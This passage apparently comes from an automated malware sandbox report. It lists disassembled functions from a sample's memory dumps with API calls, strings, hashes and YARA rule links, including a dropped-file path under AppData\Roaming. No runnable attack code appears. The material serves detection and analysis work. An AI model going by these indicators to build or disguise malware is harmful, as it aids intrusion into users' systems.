                                                          • Instruction Fuzzy Hash: 5691F631D3024AABDF50DE78CE916FDBBB5EF453A0F248279E460A7291DB305921DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00293F72, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: Gard$ZoGard
                                                          • API String ID: 3519838083-3047177976
                                                          • Opcode ID: 6f7e339e888abddd848439df6416f27e9328d0e7072b5e621a4bf9eb19a43c15
                                                          • Instruction ID: 05cb92926f30000e26474aee3d462b3ddc1db89eb3404978b4790789b4af74cd
                                                          • Opcode Fuzzy Hash: 6f7e339e888abddd848439df6416f27e9328d0e7072b5e621a4bf9eb19a43c15
                                                          • Instruction Fuzzy Hash: A7915A71D10219CFCF15DFA8D881AAEBBB5BF18304F24412DE409AB241DB75AA59CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C258D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 002C261D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          • Opcode ID: c55db65e8fb9ceda8a478ea767be66d8d3164e20d4eddc1c2d1984a71ed46e8c
                                                          • Instruction ID: 35fc387a5ce952801b0a666980f80162af3a0f095817813440a324b41469f8ef
                                                          • Opcode Fuzzy Hash: c55db65e8fb9ceda8a478ea767be66d8d3164e20d4eddc1c2d1984a71ed46e8c
                                                          • Instruction Fuzzy Hash: 5C513771A39103C6CF157F18CA41B7A6B98EB00741F314F6DF4D6822A8EE358DB89A56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045233D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 004523CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          • Opcode ID: c55db65e8fb9ceda8a478ea767be66d8d3164e20d4eddc1c2d1984a71ed46e8c
                                                          • Instruction ID: 7bd6f700b74352bb22c67118a23570e0e9fc9d0aed6b38d772ee242378468967
                                                          • Opcode Fuzzy Hash: c55db65e8fb9ceda8a478ea767be66d8d3164e20d4eddc1c2d1984a71ed46e8c
                                                          • Instruction Fuzzy Hash: 71517F71A0410196CB197B25CA4136F2B90EB42713F204D6FECD5423ABEA7D8EDD9A4F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D5A96, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlDecodePointer.NTDLL(00000000), ref: 002D5AAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: @$d/G
                                                          • API String ID: 3527080286-2360897952
                                                          • Opcode ID: b14a7ac605d25c8b9eec02168c951d2d48331889f2d7ea2e6b659a7359efd3fd
                                                          • Instruction ID: be64884ac6349d6a06e9dde0ae8ad293d785dce23b50ff42514f37ff4808f099
                                                          • Opcode Fuzzy Hash: b14a7ac605d25c8b9eec02168c951d2d48331889f2d7ea2e6b659a7359efd3fd
                                                          • Instruction Fuzzy Hash: 2B516C70920A2ACBCF149F58E9481BDBFB0FB49318F108057D481A6358C7F98E74DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C3C48, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\AppData\Roaming\cr.exe
                                                          • API String ID: 0-1319702290
                                                          • Opcode ID: 452fa996ab6f115b12d916f637a481a13359b9921f97a31077e6c15f2c325a63
                                                          • Instruction ID: 107a36663205063052a806be4c5e0b7b0070d95a33f1138c056435780f5d4b9b
                                                          • Opcode Fuzzy Hash: 452fa996ab6f115b12d916f637a481a13359b9921f97a31077e6c15f2c325a63
                                                          • Instruction Fuzzy Hash: DA418471A20615ABCB21EF999C81EDEBBF8EF85310F10896EF405A7251D7B18B50CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00416112, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00416117
                                                            • Part of subcall function 00416242: __EH_prolog.LIBCMT ref: 00416247
                                                            • Part of subcall function 0041601F: __EH_prolog.LIBCMT ref: 00416024
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 00415FEA: std::exception::exception.LIBCONCRT ref: 0041600B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Deallocatestd::exception::exception
                                                          • String ID: parse error$parse_error
                                                          • API String ID: 3877490255-1820534363
                                                          • Opcode ID: 02bcf5287bfe065e8098eae0163453e191459ca8b4c90fb741e8575df38a64b5
                                                          • Instruction ID: 145bde21cfeae7ccee6b6ba32b5e947c618bd01b3437e8af807ec3e5403158c5
                                                          • Opcode Fuzzy Hash: 02bcf5287bfe065e8098eae0163453e191459ca8b4c90fb741e8575df38a64b5
                                                          • Instruction Fuzzy Hash: 4C313B31900258DEDB14EFA6C891ADDBBB5AF14308F4080BEE445B7292DF785A49CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B508C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • _free.LIBCMT ref: 002B50F6
                                                          • _free.LIBCMT ref: 002B511C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID: @
                                                          • API String ID: 2283115069-1615503679
                                                          • Opcode ID: f9d12eebbf33fa58c787beacc8dbf23c766a81711db1285091cee13bdac76454
                                                          • Instruction ID: ad10ac6dc02addb6cd235fffe5ef82d6362694cd498845c6d6f3afe06c9df2d0
                                                          • Opcode Fuzzy Hash: f9d12eebbf33fa58c787beacc8dbf23c766a81711db1285091cee13bdac76454
                                                          • Instruction Fuzzy Hash: 91210671A70A31ABDB20BF2CAC85F9D33906B01770F244A2EE5259F2D0D7B498568BD4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00420269, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: G:\rc-build-v1-exe\json.hpp$object != nullptr
                                                          • API String ID: 3519838083-2100572481
                                                          • Opcode ID: 4473ea04567ab37ec8ae5a4dd6e0667615d4e2535223cce1030a011198853b57
                                                          • Instruction ID: 41549d8a1e931752507761a2159cf98a3d83295ae15ca4e2eeb510ae8da93077
                                                          • Opcode Fuzzy Hash: 4473ea04567ab37ec8ae5a4dd6e0667615d4e2535223cce1030a011198853b57
                                                          • Instruction Fuzzy Hash: B121EE71A00616DFC711DF6AD085AAEBBF0AF15304F50815BE455A2B52CB38EE45CBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004083A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: ", "$: "
                                                          • API String ID: 3519838083-747220369
                                                          • Opcode ID: 67973746732cacf70680c4776d85c0adb9b6dd430a2d392b28d0d12eae9834d9
                                                          • Instruction ID: f117907c529a738bdd6f5332f15ba1bb313187428953edb2a719611337c378d9
                                                          • Opcode Fuzzy Hash: 67973746732cacf70680c4776d85c0adb9b6dd430a2d392b28d0d12eae9834d9
                                                          • Instruction Fuzzy Hash: 07214F71A002099BDF25EFA6C855BEEB7B9AF84708F40843FE411B76C1DB785A09CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00416242, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00416247
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: DeallocateH_prolog
                                                          • String ID: at line $, column
                                                          • API String ID: 3708980276-191570568
                                                          • Opcode ID: 35f4304a28068854e7e0c7edea80895dac6af83390551ece068d8fc9b0e1bc40
                                                          • Instruction ID: 0245d591e3f64beeca836e3ad81db520041c6def0e5c7e8a603bd886768159cb
                                                          • Opcode Fuzzy Hash: 35f4304a28068854e7e0c7edea80895dac6af83390551ece068d8fc9b0e1bc40
                                                          • Instruction Fuzzy Hash: A321A171900108DACB19EBA5C891AEDB7B8EF94304F00417FE042B7692DF782E4DCB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002AF22C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetLastError.KERNEL32(0000000D,?,0048CC64,?,002AE4DA,?,?,002774FD,00000000,?,0027FA2F,0048CC58,00410A63,0048CC64,00000016,002774FD), ref: 002AF2AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: @
                                                          • API String ID: 1452528299-1615503679
                                                          • Opcode ID: fc0fc4d820b02e6350da7fb7a69ae8d1e86bf0d538d4a10a9ec859ef7a5c1bc3
                                                          • Instruction ID: 50991858735dea0f0dc044fc039d2529645daeac5b14da2ff0d8064144ee9e1c
                                                          • Opcode Fuzzy Hash: fc0fc4d820b02e6350da7fb7a69ae8d1e86bf0d538d4a10a9ec859ef7a5c1bc3
                                                          • Instruction Fuzzy Hash: A611E539720116AFCF526FD0ED8466EB765FF49754B108039FD0596210DFB08C208BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B6965, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: @
                                                          • API String ID: 269201875-1615503679
                                                          • Opcode ID: bc6ff080d5adcbf6f9fae5e25c10dc0100cf7d281b3edc57910d41fef92eed41
                                                          • Instruction ID: 7fb84e091907584286d390b2b63cb5d42f88c276735fe747416bc33ef19c0dd1
                                                          • Opcode Fuzzy Hash: bc6ff080d5adcbf6f9fae5e25c10dc0100cf7d281b3edc57910d41fef92eed41
                                                          • Instruction Fuzzy Hash: B611C170961A20ABDA10BF68AC85F5C37A0AB00760F20492AE5245F6E0DBB458618BD9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00278553, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: Unknown exception$ryF
                                                          • API String ID: 3519838083-1084249556
                                                          • Opcode ID: 0162ea283bec96938fdf7ff54ba57559657afa3a71c748970b2664dd05d33cd0
                                                          • Instruction ID: 6aa2449ad1483d347616fda326d8e23c9fd0c7a450deaa08413ae968007db2bd
                                                          • Opcode Fuzzy Hash: 0162ea283bec96938fdf7ff54ba57559657afa3a71c748970b2664dd05d33cd0
                                                          • Instruction Fuzzy Hash: E611BFB1404205EFCB198F18D9059AABFF5FF85304B10C55EF85A5B212D7B2EA26DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D1429, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: l#G
                                                          • API String ID: 269201875-3902621700
                                                          • Opcode ID: fd463e7dff1c3c2a3e36292218cbd82f2768cda60f3c14cb8750832b6820b762
                                                          • Instruction ID: 8e3dd607e8bb7766a203eda41bc7842c02747c9fec9e26bcd16a74d610357451
                                                          • Opcode Fuzzy Hash: fd463e7dff1c3c2a3e36292218cbd82f2768cda60f3c14cb8750832b6820b762
                                                          • Instruction Fuzzy Hash: B1F0A4325387117EE7106A25AC42BA77799DB81770F24417BF91C5AA42DF610C7149F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002AE84E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002AE85A
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002AE8B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                          • String ID: @
                                                          • API String ID: 593203224-1615503679
                                                          • Opcode ID: e6f6b2b7a1714201a237b67bb7ebcc69d1a9318d54e60b985301939bd63bf667
                                                          • Instruction ID: b22f796ca845bdcc222ccd8407df54a0a6c11a8d65fa59bfe5eb779277ea6d1e
                                                          • Opcode Fuzzy Hash: e6f6b2b7a1714201a237b67bb7ebcc69d1a9318d54e60b985301939bd63bf667
                                                          • Instruction Fuzzy Hash: 1801B135620105AFCF04EF14C885EADBBB8EF85710B0640A9E8059B361EF70ED41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C7127, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002D067E: RtlEnterCriticalSection.NTDLL(00000000), ref: 002D0699
                                                          • FlushFileBuffers.KERNEL32(00000000), ref: 002C7170
                                                          • GetLastError.KERNEL32 ref: 002C7181
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 002C7168
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                          • String ID: G:\rc-build-v1-exe\json.hpp
                                                          • API String ID: 4109680722-4142698353
                                                          • Opcode ID: d76083111377d102b0547cfb0cab2357f05ca319cf0cbd6f9031e34232498407
                                                          • Instruction ID: 9ab87c78f4e8e77c8a94d32c9182f4f49e9c78bcbea0969c8ca7fc4b2de5e7ac
                                                          • Opcode Fuzzy Hash: d76083111377d102b0547cfb0cab2357f05ca319cf0cbd6f9031e34232498407
                                                          • Instruction Fuzzy Hash: DF01C072A202009FC714AFA8D845B9D7BA4EF49720F14421BF4119B3A1DBB49C118F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00278FBC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00278FC1
                                                            • Part of subcall function 0027FC7B: __EH_prolog.LIBCMT ref: 0027FC80
                                                          Strings
                                                          • recursive_directory_iterator::recursive_directory_iterator, xrefs: 00278FFB
                                                          • izF, xrefs: 00278FBC
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: izF$recursive_directory_iterator::recursive_directory_iterator
                                                          • API String ID: 3519838083-2719882566
                                                          • Opcode ID: cf072deccb5d30fdbc1cf9a5ca379ce049aa707ccedef374d9811c2929df5029
                                                          • Instruction ID: 1aa685613803ab16791863da5c1f169507b18b62c41ed520f28c45a98b111e94
                                                          • Opcode Fuzzy Hash: cf072deccb5d30fdbc1cf9a5ca379ce049aa707ccedef374d9811c2929df5029
                                                          • Instruction Fuzzy Hash: 07F0C271A202165BC7149FAC980569AB6E9DB09210B00C67FBC18D3740FF74DD1047D4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027842C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: Unknown exception$ryF
                                                          • API String ID: 3519838083-1084249556
                                                          • Opcode ID: 7ffa39c208040921da1a489be66fb6f46563a1daf4442a6ce5c564641c38a743
                                                          • Instruction ID: 61c7b599b86f734abead2243748eb4934671b329d596e44a30dffdb2a6d809ff
                                                          • Opcode Fuzzy Hash: 7ffa39c208040921da1a489be66fb6f46563a1daf4442a6ce5c564641c38a743
                                                          • Instruction Fuzzy Hash: D3014671914B50EFCB28CF59D900A8ABBF5FF48700B00C92EE89E83A10E374A910CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0042065A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: G:\rc-build-v1-exe\json.hpp$object != nullptr
                                                          • API String ID: 3519838083-2100572481
                                                          • Opcode ID: f930cddadf30a1c351f9a389677bbbcc889395b8ad5b1e8c46cb0fcb74b5202e
                                                          • Instruction ID: 6fb835efe60de45c7a1fa616db9c80395572e2ce48a3fddc260d47c430a0f028
                                                          • Opcode Fuzzy Hash: f930cddadf30a1c351f9a389677bbbcc889395b8ad5b1e8c46cb0fcb74b5202e
                                                          • Instruction Fuzzy Hash: 66F04FB2E002149BC721EF699902A8EBBF4EB44754F10453FA905E7741EBB8861487D9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040E99D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040E9DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID: MA$e{@
                                                          • API String ID: 323602529-3135666671
                                                          • Opcode ID: 134cd221fccf279bce9a09a1d4a6cf7824ed19df44864ce195809d8a8e0c6dca
                                                          • Instruction ID: 6a6cb35622237f701dba64f28b05159cf328f782d837d6f7b13fadd267ff95dc
                                                          • Opcode Fuzzy Hash: 134cd221fccf279bce9a09a1d4a6cf7824ed19df44864ce195809d8a8e0c6dca
                                                          • Instruction Fuzzy Hash: 33F08C765042459FC710DF08D841F89B7E4EB08728F20815EE904A7780C779A9418A88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040EA26, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040EA66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID: ]A$e{@
                                                          • API String ID: 323602529-3711493409
                                                          • Opcode ID: 2c12f620b166156d29cef055f253be3eac6d840d68a16b2009e3c261c06ef3c6
                                                          • Instruction ID: 8b6c17a97bcd638100be0d2506dc9c8b00512f66d2fb7d5dc05adfc7dca00dbf
                                                          • Opcode Fuzzy Hash: 2c12f620b166156d29cef055f253be3eac6d840d68a16b2009e3c261c06ef3c6
                                                          • Instruction Fuzzy Hash: 41F04FB6A442459FCB14DF08D841F99B7E4FB0C728F20815EFA14A7781D779E941CA98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002AF5CF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,?,00000001,?,00000003,?,?,?,002AF454,?,?,00000000,00000000,00000000,00000000), ref: 002AF619
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: String
                                                          • String ID: @$qOwv
                                                          • API String ID: 2568140703-1298692707
                                                          • Opcode ID: 272bde6fb7eb2c63b37cca5999a60620155e6404b6085e116dc728335bd78fa0
                                                          • Instruction ID: f2f25e589bf8bbb805a4c0b82812675adc3218e48663d328219017e3ac82756b
                                                          • Opcode Fuzzy Hash: 272bde6fb7eb2c63b37cca5999a60620155e6404b6085e116dc728335bd78fa0
                                                          • Instruction Fuzzy Hash: D9F0B23241011AFFCF025FD0ED09CAE3F2AEB09750B008025FE1896130DB769871ABA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00278D2D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027FBD9: __EH_prolog.LIBCMT ref: 0027FBDE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: directory_iterator::directory_iterator$izF
                                                          • API String ID: 3519838083-368197588
                                                          • Opcode ID: 2d8a9f76a8c03427eca8c339fe149afff4c39f78136988ba96f502235bb3c0ec
                                                          • Instruction ID: 6ff603b955b99216c67c2e6b154ecb09adc827288a147da49807db53dcc1e90c
                                                          • Opcode Fuzzy Hash: 2d8a9f76a8c03427eca8c339fe149afff4c39f78136988ba96f502235bb3c0ec
                                                          • Instruction Fuzzy Hash: F4E06571B20115AFC714DFBCC40068A77E5EB19754B10C93FA419D3700EB74C9108B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0028633D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 0028634D
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00286358
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@
                                                          • API String ID: 4194217158-2321748739
                                                          • Opcode ID: 5f719cad465f29be497a2562b4ec26ee4e460c7c615207a498d7f367ce454d63
                                                          • Instruction ID: 63b8c58fa4b169fd42a4b54337b9ccd19bc045a3ead2c681929aefba1d0dc4f6
                                                          • Opcode Fuzzy Hash: 5f719cad465f29be497a2562b4ec26ee4e460c7c615207a498d7f367ce454d63
                                                          • Instruction Fuzzy Hash: F9D05EB28143848A82349F15E445C87A7ECD9C43203104D2FA08083200E770B8088AB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004160ED, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 004160FD
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00416108
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@
                                                          • API String ID: 4194217158-2321748739
                                                          • Opcode ID: 5f719cad465f29be497a2562b4ec26ee4e460c7c615207a498d7f367ce454d63
                                                          • Instruction ID: 9dcf8648d9f92569bddf609ff6145f8b5c7570ffd47a967313c014b2b5c29ce3
                                                          • Opcode Fuzzy Hash: 5f719cad465f29be497a2562b4ec26ee4e460c7c615207a498d7f367ce454d63
                                                          • Instruction Fuzzy Hash: A5D0A7B24043408A93309F16F845C83B7FCDDD0324310092FE48083600E774F808CA75
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002AE62C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 002AE638
                                                            • Part of subcall function 002861C1: std::exception::exception.LIBCONCRT ref: 002861CA
                                                            • Part of subcall function 002B2DA3: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000000,00488A38,?,002AE60B,00000000,004851C0,?), ref: 002B2E03
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ExceptionRaisestd::bad_exception::bad_exceptionstd::exception::exception
                                                          • String ID: bad function call$h8RH
                                                          • API String ID: 2640276836-2066287840
                                                          • Opcode ID: 0a2abf94e351a1afe09071717076b69d6fd27ee23bcd2897bd38bc32cc1fdb4e
                                                          • Instruction ID: 262f4d526fdc20a490131061f7a5c521c087d1be6cd53fbeeabc27db51862236
                                                          • Opcode Fuzzy Hash: 0a2abf94e351a1afe09071717076b69d6fd27ee23bcd2897bd38bc32cc1fdb4e
                                                          • Instruction Fuzzy Hash: BCC0122CD1020C77CF00FAF4D84ADDC77295A00700B904461761092192EBB896298B87
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043E3DC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0043E3E8
                                                            • Part of subcall function 00415F71: std::exception::exception.LIBCONCRT ref: 00415F7A
                                                            • Part of subcall function 00442B53: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000000,?,?,0043E3BB,00000000,004851C0,?), ref: 00442BB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ExceptionRaisestd::bad_exception::bad_exceptionstd::exception::exception
                                                          • String ID: bad function call$h8RH
                                                          • API String ID: 2640276836-2066287840
                                                          • Opcode ID: 0a2abf94e351a1afe09071717076b69d6fd27ee23bcd2897bd38bc32cc1fdb4e
                                                          • Instruction ID: 6f7533e401e1f33e75cde9c8b2eae97c7cbe5d83e4447f3cb2bffb6039ec5def
                                                          • Opcode Fuzzy Hash: 0a2abf94e351a1afe09071717076b69d6fd27ee23bcd2897bd38bc32cc1fdb4e
                                                          • Instruction Fuzzy Hash: 4EC0123CD0020C77CF00FAF5C856DDC77289A00304BD08466B51096151EBBCA65A878A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

